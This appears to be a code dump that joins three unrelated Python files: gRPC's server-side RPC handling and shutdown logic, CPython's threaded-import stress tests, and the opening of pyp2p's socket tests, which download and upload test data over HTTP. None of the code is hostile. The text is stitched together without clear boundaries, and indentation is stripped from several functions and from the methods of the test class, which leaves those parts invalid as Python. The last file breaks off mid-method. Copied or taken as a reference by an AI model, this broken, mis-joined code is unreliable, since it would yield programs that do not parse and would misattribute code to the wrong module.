            _LOGGER.error(
                'abort() called with StatusCode.OK; returning UNKNOWN')
            code = grpc.StatusCode.UNKNOWN
            details = ''
        with self._state.condition:
            self._state.code = code
            self._state.details = _common.encode(details)
            # A unique sentinel exception: _call_behavior recognizes it by
            # identity and converts it into an aborted status.
            self._state.abortion = Exception()
            raise self._state.abortion

    def abort_with_status(self, status):
        # NOTE(review): trailing_metadata is written here without holding
        # state.condition, unlike set_trailing_metadata() — confirm intended.
        self._state.trailing_metadata = status.trailing_metadata
        self.abort(status.code, status.details)

    def set_code(self, code):
        with self._state.condition:
            self._state.code = code

    def set_details(self, details):
        with self._state.condition:
            self._state.details = _common.encode(details)
class _RequestIterator(object):
    """Iterator over the request messages of a streaming-request RPC."""

    def __init__(self, state, call, request_deserializer):
        self._state = state
        self._call = call
        self._request_deserializer = request_deserializer

    def _raise_or_start_receive_message(self):
        # Called under state.condition: start a receive, or terminate the
        # iteration when the stream can no longer yield messages.
        if self._state.client is _CANCELLED:
            _raise_rpc_error(self._state)
        elif self._state.client is _CLOSED or self._state.statused:
            raise StopIteration()
        else:
            self._call.start_server_batch(
                (cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
                _receive_message(self._state, self._call,
                                 self._request_deserializer))
            self._state.due.add(_RECEIVE_MESSAGE_TOKEN)

    def _look_for_request(self):
        # Called under state.condition. Returns the pending request, or None
        # when a receive is still outstanding (caller keeps waiting).
        if self._state.client is _CANCELLED:
            _raise_rpc_error(self._state)
        elif (self._state.request is None and
              _RECEIVE_MESSAGE_TOKEN not in self._state.due):
            # Nothing arrived and nothing is outstanding: stream exhausted.
            raise StopIteration()
        else:
            request = self._state.request
            self._state.request = None
            return request
        raise AssertionError()  # should never run; every branch returns/raises

    def _next(self):
        with self._state.condition:
            self._raise_or_start_receive_message()
            # Wait until the receive-message callback publishes a request.
            while True:
                self._state.condition.wait()
                request = self._look_for_request()
                if request is not None:
                    return request

    def __iter__(self):
        return self

    def __next__(self):
        return self._next()

    def next(self):
        # Python 2 iterator-protocol alias.
        return self._next()
def _unary_request(rpc_event, state, request_deserializer):
    """Return a thunk that blocks until the single request message arrives.

    The thunk yields the deserialized request, or None if the RPC was
    cancelled or terminated before a request was received.
    """

    def unary_request():
        with state.condition:
            if state.client is _CANCELLED or state.statused:
                return None
            else:
                rpc_event.call.start_server_batch(
                    (cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
                    _receive_message(state, rpc_event.call,
                                     request_deserializer))
                state.due.add(_RECEIVE_MESSAGE_TOKEN)
                # Wait for the receive-message callback to publish a request
                # or for the client stream to close/cancel.
                while True:
                    state.condition.wait()
                    if state.request is None:
                        if state.client is _CLOSED:
                            # Half-closed without sending any message.
                            details = '"{}" requires exactly one request message.'.format(
                                rpc_event.call_details.method)
                            _abort(state, rpc_event.call,
                                   cygrpc.StatusCode.unimplemented,
                                   _common.encode(details))
                            return None
                        elif state.client is _CANCELLED:
                            return None
                    else:
                        request = state.request
                        state.request = None
                        return request

    return unary_request
def _call_behavior(rpc_event, state, behavior, argument, request_deserializer):
    """Invoke the application *behavior*; return a (result, proceed) pair."""
    context = _Context(rpc_event, state, request_deserializer)
    try:
        return behavior(argument, context), True
    except Exception as exception:  # pylint: disable=broad-except
        with state.condition:
            if exception is state.abortion:
                # Raised by context.abort(): code/details already live on state.
                _abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
                       b'RPC Aborted')
            elif exception not in state.rpc_errors:
                # Genuine application failure (RpcErrors we raised ourselves
                # via _raise_rpc_error are deliberately not re-reported).
                details = 'Exception calling application: {}'.format(exception)
                _LOGGER.exception(details)
                _abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
                       _common.encode(details))
        return None, False
def _take_response_from_response_iterator(rpc_event, state, response_iterator):
    """Pull one response from the servicer's iterator.

    Returns (response, proceed); (None, True) signals normal exhaustion and
    (None, False) signals an error (the RPC has been aborted).
    """
    try:
        return next(response_iterator), True
    except StopIteration:
        return None, True
    except Exception as exception:  # pylint: disable=broad-except
        with state.condition:
            if exception is state.abortion:
                # Raised by context.abort() inside the iterator.
                _abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
                       b'RPC Aborted')
            elif exception not in state.rpc_errors:
                details = 'Exception iterating responses: {}'.format(exception)
                _LOGGER.exception(details)
                _abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
                       _common.encode(details))
        return None, False
def _serialize_response(rpc_event, state, response, response_serializer):
    """Serialize *response*; abort the RPC and return None on failure."""
    serialized = _common.serialize(response, response_serializer)
    if serialized is not None:
        return serialized
    with state.condition:
        _abort(state, rpc_event.call, cygrpc.StatusCode.internal,
               b'Failed to serialize response!')
    return None
def _send_response(rpc_event, state, serialized_response):
    """Send one serialized message, blocking until it is delivered.

    Returns True when the RPC is still writable afterwards, False when the
    client cancelled or a trailing status has already been sent.
    """
    with state.condition:
        if state.client is _CANCELLED or state.statused:
            return False
        else:
            if state.initial_metadata_allowed:
                # First write: piggyback (empty) initial metadata.
                operations = (
                    cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
                    cygrpc.SendMessageOperation(serialized_response,
                                                _EMPTY_FLAGS),
                )
                state.initial_metadata_allowed = False
                token = _SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN
            else:
                operations = (cygrpc.SendMessageOperation(
                    serialized_response, _EMPTY_FLAGS),)
                token = _SEND_MESSAGE_TOKEN
            rpc_event.call.start_server_batch(operations,
                                              _send_message(state, token))
            state.due.add(token)
            # Block until the completion callback retires our token.
            while True:
                state.condition.wait()
                if token not in state.due:
                    return state.client is not _CANCELLED and not state.statused
def _status(rpc_event, state, serialized_response):
    """Send the trailing status (plus optional final message) for the RPC."""
    with state.condition:
        if state.client is not _CANCELLED:
            code = _completion_code(state)
            details = _details(state)
            operations = [
                cygrpc.SendStatusFromServerOperation(
                    state.trailing_metadata, code, details, _EMPTY_FLAGS),
            ]
            if state.initial_metadata_allowed:
                # Initial metadata was never sent; include it in this batch.
                operations.append(
                    cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS))
            if serialized_response is not None:
                operations.append(
                    cygrpc.SendMessageOperation(serialized_response,
                                                _EMPTY_FLAGS))
            rpc_event.call.start_server_batch(
                operations,
                _send_status_from_server(state, _SEND_STATUS_FROM_SERVER_TOKEN))
            state.statused = True
            state.due.add(_SEND_STATUS_FROM_SERVER_TOKEN)
def _unary_response_in_pool(rpc_event, state, behavior, argument_thunk,
                            request_deserializer, response_serializer):
    """Thread-pool body for RPCs that produce a single response message."""
    cygrpc.install_census_context_from_call(rpc_event.call)
    try:
        # argument_thunk blocks until the request (or request iterator) is
        # available; None means the RPC already terminated.
        argument = argument_thunk()
        if argument is not None:
            response, proceed = _call_behavior(rpc_event, state, behavior,
                                               argument, request_deserializer)
            if proceed:
                serialized_response = _serialize_response(
                    rpc_event, state, response, response_serializer)
                if serialized_response is not None:
                    _status(rpc_event, state, serialized_response)
    finally:
        cygrpc.uninstall_context()
def _stream_response_in_pool(rpc_event, state, behavior, argument_thunk,
                             request_deserializer, response_serializer):
    """Thread-pool body for RPCs that produce a stream of response messages."""
    cygrpc.install_census_context_from_call(rpc_event.call)
    try:
        argument = argument_thunk()
        if argument is not None:
            response_iterator, proceed = _call_behavior(
                rpc_event, state, behavior, argument, request_deserializer)
            if proceed:
                # Drain the iterator: each response is serialized and sent;
                # exhaustion (response is None) sends the trailing status.
                while True:
                    response, proceed = _take_response_from_response_iterator(
                        rpc_event, state, response_iterator)
                    if proceed:
                        if response is None:
                            _status(rpc_event, state, None)
                            break
                        else:
                            serialized_response = _serialize_response(
                                rpc_event, state, response, response_serializer)
                            if serialized_response is not None:
                                proceed = _send_response(
                                    rpc_event, state, serialized_response)
                                if not proceed:
                                    break
                            else:
                                break
                    else:
                        break
    finally:
        cygrpc.uninstall_context()
def _handle_unary_unary(rpc_event, state, method_handler, thread_pool):
    """Schedule a unary-request/unary-response RPC; returns its Future."""
    argument_thunk = _unary_request(rpc_event, state,
                                    method_handler.request_deserializer)
    return thread_pool.submit(_unary_response_in_pool, rpc_event, state,
                              method_handler.unary_unary, argument_thunk,
                              method_handler.request_deserializer,
                              method_handler.response_serializer)
def _handle_unary_stream(rpc_event, state, method_handler, thread_pool):
    """Schedule a unary-request/stream-response RPC; returns its Future."""
    argument_thunk = _unary_request(rpc_event, state,
                                    method_handler.request_deserializer)
    return thread_pool.submit(_stream_response_in_pool, rpc_event, state,
                              method_handler.unary_stream, argument_thunk,
                              method_handler.request_deserializer,
                              method_handler.response_serializer)
def _handle_stream_unary(rpc_event, state, method_handler, thread_pool):
    """Schedule a stream-request/unary-response RPC; returns its Future."""
    iterator = _RequestIterator(state, rpc_event.call,
                                method_handler.request_deserializer)

    def argument_thunk():
        return iterator

    return thread_pool.submit(_unary_response_in_pool, rpc_event, state,
                              method_handler.stream_unary, argument_thunk,
                              method_handler.request_deserializer,
                              method_handler.response_serializer)
def _handle_stream_stream(rpc_event, state, method_handler, thread_pool):
    """Schedule a stream-request/stream-response RPC; returns its Future."""
    iterator = _RequestIterator(state, rpc_event.call,
                                method_handler.request_deserializer)

    def argument_thunk():
        return iterator

    return thread_pool.submit(_stream_response_in_pool, rpc_event, state,
                              method_handler.stream_stream, argument_thunk,
                              method_handler.request_deserializer,
                              method_handler.response_serializer)
def _find_method_handler(rpc_event, generic_handlers, interceptor_pipeline):
    """Locate the method handler for *rpc_event*, running interceptors if any."""

    def query_handlers(handler_call_details):
        # First handler that recognizes the method wins.
        for generic_handler in generic_handlers:
            candidate = generic_handler.service(handler_call_details)
            if candidate is not None:
                return candidate
        return None

    details = _HandlerCallDetails(
        _common.decode(rpc_event.call_details.method),
        rpc_event.invocation_metadata)
    if interceptor_pipeline is None:
        return query_handlers(details)
    return interceptor_pipeline.execute(query_handlers, details)
def _reject_rpc(rpc_event, status, details):
    """Refuse *rpc_event* with *status*/*details* without running a handler."""
    rpc_state = _RPCState()
    batch = (
        cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
        cygrpc.ReceiveCloseOnServerOperation(_EMPTY_FLAGS),
        cygrpc.SendStatusFromServerOperation(None, status, details,
                                             _EMPTY_FLAGS),
    )
    rpc_event.call.start_server_batch(batch,
                                      lambda ignored_event: (rpc_state, (),))
    return rpc_state
def _handle_with_method_handler(rpc_event, method_handler, thread_pool):
    """Begin servicing *rpc_event*: watch for client close and dispatch by cardinality."""
    state = _RPCState()
    with state.condition:
        rpc_event.call.start_server_batch(
            (cygrpc.ReceiveCloseOnServerOperation(_EMPTY_FLAGS),),
            _receive_close_on_server(state))
        state.due.add(_RECEIVE_CLOSE_ON_SERVER_TOKEN)
        # Select the handler for the (request, response) streaming combination.
        if method_handler.request_streaming:
            handle = (_handle_stream_stream if method_handler.response_streaming
                      else _handle_stream_unary)
        else:
            handle = (_handle_unary_stream if method_handler.response_streaming
                      else _handle_unary_unary)
        return state, handle(rpc_event, state, method_handler, thread_pool)
def _handle_call(rpc_event, generic_handlers, interceptor_pipeline, thread_pool,
                 concurrency_exceeded):
    """Dispatch one incoming call.

    Returns (rpc_state, future): both None when the event is unusable, and
    future None when the RPC was rejected without running a handler.
    """
    if not rpc_event.success:
        return None, None
    if rpc_event.call_details.method is not None:
        try:
            method_handler = _find_method_handler(rpc_event, generic_handlers,
                                                  interceptor_pipeline)
        except Exception as exception:  # pylint: disable=broad-except
            # A failing generic handler or interceptor must not kill the
            # serving thread; reject the call instead.
            details = 'Exception servicing handler: {}'.format(exception)
            _LOGGER.exception(details)
            return _reject_rpc(rpc_event, cygrpc.StatusCode.unknown,
                               b'Error in service handler!'), None
        if method_handler is None:
            return _reject_rpc(rpc_event, cygrpc.StatusCode.unimplemented,
                               b'Method not found!'), None
        elif concurrency_exceeded:
            return _reject_rpc(rpc_event, cygrpc.StatusCode.resource_exhausted,
                               b'Concurrent RPC limit exceeded!'), None
        else:
            return _handle_with_method_handler(rpc_event, method_handler,
                                               thread_pool)
    else:
        return None, None
@enum.unique
class _ServerStage(enum.Enum):
    """Server lifecycle stage: STOPPED -> STARTED -> GRACE -> STOPPED."""
    STOPPED = 'stopped'
    STARTED = 'started'
    GRACE = 'grace'
class _ServerState(object):
    """Mutable state shared between the _Server facade and the serving thread."""

    # pylint: disable=too-many-arguments
    def __init__(self, completion_queue, server, generic_handlers,
                 interceptor_pipeline, thread_pool, maximum_concurrent_rpcs):
        # Guards the fields below.
        self.lock = threading.RLock()
        self.completion_queue = completion_queue
        self.server = server
        self.generic_handlers = list(generic_handlers)
        self.interceptor_pipeline = interceptor_pipeline
        self.thread_pool = thread_pool
        self.stage = _ServerStage.STOPPED
        # Events to set when shutdown completes; None until shutdown begins.
        self.shutdown_events = None
        self.maximum_concurrent_rpcs = maximum_concurrent_rpcs
        # Number of RPC handler futures currently outstanding.
        self.active_rpc_count = 0
        # TODO(https://github.com/grpc/grpc/issues/6597): eliminate these fields.
        self.rpc_states = set()
        self.due = set()
        # A "volatile" flag to interrupt the daemon serving thread
        self.server_deallocated = False
def _add_generic_handlers(state, generic_handlers):
with state.lock:
state.generic_handlers.extend(generic_handlers)
def _add_insecure_port(state, address):
with state.lock:
return state.server.add_http2_port(address)
def _add_secure_port(state, address, server_credentials):
with state.lock:
return state.server.add_http2_port(address,
server_credentials._credentials)
def _request_call(state):
    """Ask the core for the next incoming call, tracking the outstanding tag."""
    queue = state.completion_queue
    state.server.request_call(queue, queue, _REQUEST_CALL_TAG)
    state.due.add(_REQUEST_CALL_TAG)
# TODO(https://github.com/grpc/grpc/issues/6597): delete this function.
def _stop_serving(state):
    """Destroy the server once nothing is outstanding; returns True if stopped."""
    if state.rpc_states or state.due:
        return False
    state.server.destroy()
    for shutdown_event in state.shutdown_events:
        shutdown_event.set()
    state.stage = _ServerStage.STOPPED
    return True
def _on_call_completed(state):
with state.lock:
state.active_rpc_count -= 1
def _process_event_and_continue(state, event):
    """Handle one completion-queue event; returns False once serving should stop."""
    should_continue = True
    if event.tag is _SHUTDOWN_TAG:
        with state.lock:
            state.due.remove(_SHUTDOWN_TAG)
            if _stop_serving(state):
                should_continue = False
    elif event.tag is _REQUEST_CALL_TAG:
        with state.lock:
            state.due.remove(_REQUEST_CALL_TAG)
            concurrency_exceeded = (
                state.maximum_concurrent_rpcs is not None and
                state.active_rpc_count >= state.maximum_concurrent_rpcs)
            rpc_state, rpc_future = _handle_call(
                event, state.generic_handlers, state.interceptor_pipeline,
                state.thread_pool, concurrency_exceeded)
            if rpc_state is not None:
                state.rpc_states.add(rpc_state)
            if rpc_future is not None:
                state.active_rpc_count += 1
                rpc_future.add_done_callback(
                    lambda unused_future: _on_call_completed(state))
            if state.stage is _ServerStage.STARTED:
                # Keep one request-call outstanding while serving.
                _request_call(state)
            elif _stop_serving(state):
                should_continue = False
    else:
        # Any other tag is an RPC-batch completion callback installed by the
        # _send_*/_receive_* helpers; calling it yields (rpc_state, callbacks).
        rpc_state, callbacks = event.tag(event)
        for callback in callbacks:
            callable_util.call_logging_exceptions(callback,
                                                  'Exception calling callback!')
        if rpc_state is not None:
            # A non-None rpc_state means that RPC just fully terminated.
            with state.lock:
                state.rpc_states.remove(rpc_state)
                if _stop_serving(state):
                    should_continue = False
    return should_continue
def _serve(state):
    """Daemon loop: poll the completion queue and process events until stopped."""
    while True:
        timeout = time.time() + _DEALLOCATED_SERVER_CHECK_PERIOD_S
        event = state.completion_queue.poll(timeout)
        if state.server_deallocated:
            # The public _Server wrapper was garbage-collected; shut down.
            _begin_shutdown_once(state)
        if event.completion_type != cygrpc.CompletionType.queue_timeout:
            if not _process_event_and_continue(state, event):
                return
        # We want to force the deletion of the previous event
        # ~before~ we poll again; if the event has a reference
        # to a shutdown Call object, this can induce spinlock.
        event = None
def _begin_shutdown_once(state):
    """Kick off server shutdown exactly once; later calls are no-ops."""
    with state.lock:
        if state.stage is not _ServerStage.STARTED:
            return
        state.server.shutdown(state.completion_queue, _SHUTDOWN_TAG)
        state.stage = _ServerStage.GRACE
        state.shutdown_events = []
        state.due.add(_SHUTDOWN_TAG)
def _stop(state, grace):
    """Initiate shutdown; returns an Event that is set once it completes.

    ``grace=None`` cancels all in-flight RPCs and blocks until shutdown is
    finished; otherwise a helper thread cancels whatever is still running
    after *grace* seconds and this call returns immediately.
    """
    with state.lock:
        if state.stage is _ServerStage.STOPPED:
            # Already stopped: hand back an already-set event.
            shutdown_event = threading.Event()
            shutdown_event.set()
            return shutdown_event
        else:
            _begin_shutdown_once(state)
            shutdown_event = threading.Event()
            state.shutdown_events.append(shutdown_event)
            if grace is None:
                state.server.cancel_all_calls()
            else:

                def cancel_all_calls_after_grace():
                    # If shutdown completes before the grace period elapses,
                    # the wait returns early and cancellation is a no-op.
                    shutdown_event.wait(timeout=grace)
                    with state.lock:
                        state.server.cancel_all_calls()

                thread = threading.Thread(target=cancel_all_calls_after_grace)
                thread.start()
                return shutdown_event
    # grace is None: block (outside the lock) until shutdown finishes.
    shutdown_event.wait()
    return shutdown_event
def _start(state):
    """Start the core server and spawn the daemon serving thread."""
    with state.lock:
        if state.stage is not _ServerStage.STOPPED:
            raise ValueError('Cannot start already-started server!')
        state.server.start()
        state.stage = _ServerStage.STARTED
        _request_call(state)
        serving_thread = threading.Thread(target=_serve, args=(state,))
        serving_thread.daemon = True
        serving_thread.start()
def _validate_generic_rpc_handlers(generic_rpc_handlers):
for generic_rpc_handler in generic_rpc_handlers:
service_attribute = getattr(generic_rpc_handler, 'service', None)
if service_attribute is None:
raise AttributeError(
'"{}" must conform to grpc.GenericRpcHandler type but does '
'not have "service" method!'.format(generic_rpc_handler))
class _Server(grpc.Server):
    """Public grpc.Server implementation delegating to module-level helpers."""

    # pylint: disable=too-many-arguments
    def __init__(self, thread_pool, generic_handlers, interceptors, options,
                 maximum_concurrent_rpcs):
        completion_queue = cygrpc.CompletionQueue()
        server = cygrpc.Server(options)
        server.register_completion_queue(completion_queue)
        self._state = _ServerState(completion_queue, server, generic_handlers,
                                   _interceptor.service_pipeline(interceptors),
                                   thread_pool, maximum_concurrent_rpcs)

    def add_generic_rpc_handlers(self, generic_rpc_handlers):
        _validate_generic_rpc_handlers(generic_rpc_handlers)
        _add_generic_handlers(self._state, generic_rpc_handlers)

    def add_insecure_port(self, address):
        return _add_insecure_port(self._state, _common.encode(address))

    def add_secure_port(self, address, server_credentials):
        return _add_secure_port(self._state, _common.encode(address),
                                server_credentials)

    def start(self):
        _start(self._state)

    def stop(self, grace):
        return _stop(self._state, grace)

    def __del__(self):
        # hasattr guards against a partially-constructed instance.
        if hasattr(self, '_state'):
            # We can not grab a lock in __del__(), so set a flag to signal the
            # serving daemon thread (if it exists) to initiate shutdown.
            self._state.server_deallocated = True
def create_server(thread_pool, generic_rpc_handlers, interceptors, options,
                  maximum_concurrent_rpcs):
    """Validate the handlers, then construct and return a _Server."""
    _validate_generic_rpc_handlers(generic_rpc_handlers)
    server = _Server(thread_pool, generic_rpc_handlers, interceptors, options,
                     maximum_concurrent_rpcs)
    return server
|
test_threaded_import.py | # This is a variant of the very old (early 90's) file
# Demo/threads/bug.py. It simply provokes a number of threads into
# trying to import the same module "at the same time".
# There are no pleasant failure modes -- most likely is that Python
# complains several times about module random having no attribute
# randrange, and then Python hangs.
import _imp as imp
import os
import importlib
import sys
import time
import shutil
import unittest
from test.support import (
verbose, import_module, run_unittest, TESTFN, reap_threads,
forget, unlink, rmtree)
threading = import_module('threading')
def task(N, done, done_tasks, errors):
    """Worker body: import random/modulefinder in alternating order, then
    verify that `random` was completely initialized.

    N: total thread count; done: Event set by the last finisher;
    done_tasks: shared list of finished thread idents; errors: shared
    list collecting any exceptions.
    """
    try:
        # We don't use modulefinder but still import it in order to stress
        # importing of different modules from several threads.
        if len(done_tasks) % 2:
            import modulefinder
            import random
        else:
            import random
            import modulefinder
        # This will fail if random is not completely initialized
        x = random.randrange(1, 3)
    except Exception as e:
        # Strip the traceback so the exception can outlive this thread.
        errors.append(e.with_traceback(None))
    finally:
        done_tasks.append(threading.get_ident())
        finished = len(done_tasks) == N
        if finished:
            done.set()
# Create a circular import structure: A -> C -> B -> D -> A
# NOTE: `time` is already loaded and therefore doesn't threaten to deadlock.
circular_imports_modules = {
'A': """if 1:
import time
time.sleep(%(delay)s)
x = 'a'
import C
""",
'B': """if 1:
import time
time.sleep(%(delay)s)
x = 'b'
import D
""",
'C': """import B""",
'D': """import A""",
}
class Finder:
    """A dummy finder to detect concurrent access to its find_spec()
    method."""

    def __init__(self):
        self.numcalls = 0
        self.x = 0
        self.lock = threading.Lock()

    def find_spec(self, name, path=None, target=None):
        # Simulate some thread-unsafe behaviour. If calls to find_spec()
        # are properly serialized, `x` will end up the same as `numcalls`.
        # Otherwise not.
        assert imp.lock_held()
        with self.lock:
            self.numcalls += 1
        # Deliberately racy read-modify-write; the sleep widens the window.
        x = self.x
        time.sleep(0.01)
        self.x = x + 1
class FlushingFinder:
    """A dummy finder which flushes sys.path_importer_cache when it gets
    called."""

    def find_spec(self, name, path=None, target=None):
        # Clearing the cache forces the path hooks to run on every import.
        sys.path_importer_cache.clear()
class ThreadedImportTests(unittest.TestCase):
def setUp(self):
self.old_random = sys.modules.pop('random', None)
def tearDown(self):
# If the `random` module was already initialized, we restore the
# old module at the end so that pickling tests don't fail.
# See http://bugs.python.org/issue3657#msg110461
if self.old_random is not None:
sys.modules['random'] = self.old_random
def check_parallel_module_init(self):
if imp.lock_held():
# This triggers on, e.g., from test import autotest.
raise unittest.SkipTest("can't run when import lock is held")
done = threading.Event()
for N in (20, 50) * 3:
if verbose:
print("Trying", N, "threads ...", end=' ')
# Make sure that random and modulefinder get reimported freshly
for modname in ['random', 'modulefinder']:
try:
del sys.modules[modname]
except KeyError:
pass
errors = []
done_tasks = []
done.clear()
for i in range(N):
t = threading.Thread(target=task,
args=(N, done, done_tasks, errors,))
t.start()
self.assertTrue(done.wait(60))
self.assertFalse(errors)
if verbose:
print("OK.")
def test_parallel_module_init(self):
self.check_parallel_module_init()
def test_parallel_meta_path(self):
finder = Finder()
sys.meta_path.insert(0, finder)
try:
self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(finder)
def test_parallel_path_hooks(self):
# Here the Finder instance is only used to check concurrent calls
# to path_hook().
finder = Finder()
# In order for our path hook to be called at each import, we need
# to flush the path_importer_cache, which we do by registering a
# dedicated meta_path entry.
flushing_finder = FlushingFinder()
def path_hook(path):
finder.find_spec('')
raise ImportError
sys.path_hooks.insert(0, path_hook)
sys.meta_path.append(flushing_finder)
try:
# Flush the cache a first time
flushing_finder.find_spec('')
numtests = self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(flushing_finder)
sys.path_hooks.remove(path_hook)
def test_import_hangers(self):
# In case this test is run again, make sure the helper module
# gets loaded from scratch again.
try:
del sys.modules['test.threaded_import_hangers']
except KeyError:
pass
import test.threaded_import_hangers
self.assertFalse(test.threaded_import_hangers.errors)
def test_circular_imports(self):
    # The goal of this test is to exercise implementations of the import
    # lock which use a per-module lock, rather than a global lock.
    # In these implementations, there is a possible deadlock with
    # circular imports, for example:
    # - thread 1 imports A (grabbing the lock for A) which imports B
    # - thread 2 imports B (grabbing the lock for B) which imports A
    # Such implementations should be able to detect such situations and
    # resolve them one way or the other, without freezing.
    # NOTE: our test constructs a slightly less trivial import cycle,
    # in order to better stress the deadlock avoidance mechanism.
    delay = 0.5
    os.mkdir(TESTFN)
    self.addCleanup(shutil.rmtree, TESTFN)
    sys.path.insert(0, TESTFN)
    self.addCleanup(sys.path.remove, TESTFN)
    # Write the cycle's modules to disk, substituting the import delay into
    # each module template.
    for name, contents in circular_imports_modules.items():
        contents = contents % {'delay': delay}
        with open(os.path.join(TESTFN, name + ".py"), "wb") as f:
            f.write(contents.encode('utf-8'))
        self.addCleanup(forget, name)
    importlib.invalidate_caches()
    results = []
    def import_ab():
        import A
        results.append(getattr(A, 'x', None))
    def import_ba():
        import B
        results.append(getattr(B, 'x', None))
    t1 = threading.Thread(target=import_ab)
    t2 = threading.Thread(target=import_ba)
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    # Both imports must have completed (i.e. no deadlock) and produced the
    # expected module attributes.
    self.assertEqual(set(results), {'a', 'b'})
def test_side_effect_import(self):
    # Importing a module whose top level spawns a thread that itself
    # performs an import must not deadlock.
    code = """if 1:
        import threading
        def target():
            import random
        t = threading.Thread(target=target)
        t.start()
        t.join()"""
    sys.path.insert(0, os.curdir)
    self.addCleanup(sys.path.remove, os.curdir)
    filename = TESTFN + ".py"
    with open(filename, "wb") as f:
        f.write(code.encode('utf-8'))
    self.addCleanup(unlink, filename)
    self.addCleanup(forget, TESTFN)
    self.addCleanup(rmtree, '__pycache__')
    importlib.invalidate_caches()
    # The import itself is the assertion: it must complete without hanging.
    __import__(TESTFN)
@reap_threads
def test_main():
    """Run the threaded-import test suite under a tiny thread switch
    interval, restoring the original interval afterwards."""
    saved_interval = None
    # A very small switch interval maximizes thread interleaving and thus
    # the chance of provoking import races; not every platform supports it.
    try:
        saved_interval = sys.getswitchinterval()
        sys.setswitchinterval(1e-5)
    except AttributeError:
        pass
    try:
        run_unittest(ThreadedImportTests)
    finally:
        if saved_interval is not None:
            sys.setswitchinterval(saved_interval)
if __name__ == "__main__":
    # Allow running this test module directly.
    test_main()
|
test_sock.py | """
* Test whether multiple recvs on the same connection (non-blocking) will
eventually have the connection closed (use another net instance.)
* Test whether multiple sends on the same connection (non-blocking) will
eventually lead to the connection being closed (use a net instance with
no recvs! and loop over the cons)
(Not implemented for now since these will greatly slow the build.)
"""
import hashlib
import os
import tempfile
from threading import Thread
from unittest import TestCase
from pyp2p.net import rendezvous_servers
from pyp2p.rendezvous_client import RendezvousClient
from pyp2p.sock import *
if sys.version_info >= (3, 0, 0):
from urllib.parse import urlparse
import socketserver as SocketServer
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
else:
from urlparse import urlparse
import SocketServer
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
class ThreadingSimpleServer(
    SocketServer.ThreadingMixIn,
    HTTPServer
):
    # HTTPServer that serves each request in its own thread; used as a
    # throwaway peer by the broken-connection tests below.
    pass
def md5sum(fname):
    """Return the hexadecimal MD5 digest of the file at *fname*.

    The file is read in 4 KiB chunks so arbitrarily large files can be
    hashed without loading them fully into memory.
    """
    digest = hashlib.md5()
    with open(fname, "rb") as handle:
        chunk = handle.read(4096)
        while chunk:
            digest.update(chunk)
            chunk = handle.read(4096)
    return digest.hexdigest()
class SockDownload:
    # Helper that downloads a file over raw HTTP using the pyp2p Sock class
    # and verifies its MD5 hash; used to exercise Sock's recv paths.
    def __init__(self, url, expected_hash, file_size, blocking=0,
                 encoding="ascii"):
        """
        Download a file from a HTTP URL and compare it to an MD5 hash.
        Uses the sock.py module for testing.
        :param url: URL to download
        :param expected_hash: MD5 hash of file (md5sum file from term)
        :param file_size: size in bytes of the file to download
        :param blocking: use blocking or non-blocking sockets
        :return:
        """
        url = urlparse(url)
        location = url.netloc.split(":")
        if len(location) == 1:
            port = 80
            host, = location
        else:
            # NOTE(review): port stays a string here; presumably Sock
            # accepts that - confirm against pyp2p.sock.
            host, port = location
        con = Sock(host, port, blocking=blocking, debug=1)
        req = self.build_request(host, url.path)
        con.send(req, send_all=1)
        buf = u""
        eof = u"\r\n\r\n"
        # Consume the HTTP response headers one character at a time until
        # the blank line separating headers from the body is seen.
        while buf != eof and con.connected:
            ch = con.recv(1)
            if len(ch):
                buf += ch
                # Count how long the current run of matching eof
                # characters at the end of buf is.
                eq = 0
                for i in range(0, len(buf)):
                    if buf[i] != eof[eq]:
                        eq = 0
                    else:
                        eq += 1
                # Reset buf.
                if eq == len(eof):
                    break
        # Stream the body to a temp file, then hash and delete it.
        fp, path = tempfile.mkstemp()
        os.close(fp)
        remaining = file_size
        with open(path, "ab") as fp:
            future = time.time() + 30  # Slow connections are slow.
            while con.connected and remaining:
                data = con.recv(remaining, encoding=encoding)
                print(type(data))
                if len(data):
                    remaining -= len(data)
                    fp.write(data)
                time.sleep(0.0002)
                # Fail safe:
                if time.time() >= future:
                    break
        found_hash = md5sum(path)
        os.remove(path)
        if expected_hash is not None:
            assert(found_hash == expected_hash)

    def build_request(self, host, resource):
        # Minimal HTTP/1.1 GET request for *resource* on *host*.
        req = "GET %s HTTP/1.1\r\n" % resource
        req += "Host: %s\r\n\r\n" % host
        return req
class SockUpload:
    # Helper that POSTs a generated payload to a known test endpoint using
    # Sock, then checks the server echoed the payload's SHA-256 hash.
    def __init__(self, upload_size, blocking=0):
        host = u"185.86.149.128"
        port = 80
        resource = u"/upload_test.php"
        content = self.build_content(upload_size)
        con = Sock(host, port, blocking=blocking, debug=1)
        req = self.build_request(host, resource, content)
        con.send(req, send_all=1, timeout=6)
        # Now do the actual upload.
        remaining = upload_size
        chunk_size = 4096
        while con.connected and remaining:
            sent = upload_size - remaining
            msg = content[sent:sent + chunk_size]
            sent = con.send(msg)
            if sent:
                remaining -= sent
        # Get response.
        con.set_blocking(1)
        ret = con.recv(1024)
        # Check response.
        expected_hash = hashlib.sha256(content).hexdigest()
        assert(expected_hash in ret)

    def build_request(self, host, resource, content):
        # HTTP POST headers; the body itself is streamed by the caller.
        req = "POST %s HTTP/1.1\r\n" % resource
        req += "Host: %s\r\n" % host
        req += "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) "
        req += "Gecko/20100101 Firefox/42.0\r\n"
        req += "Accept: text/html,"
        req += "application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
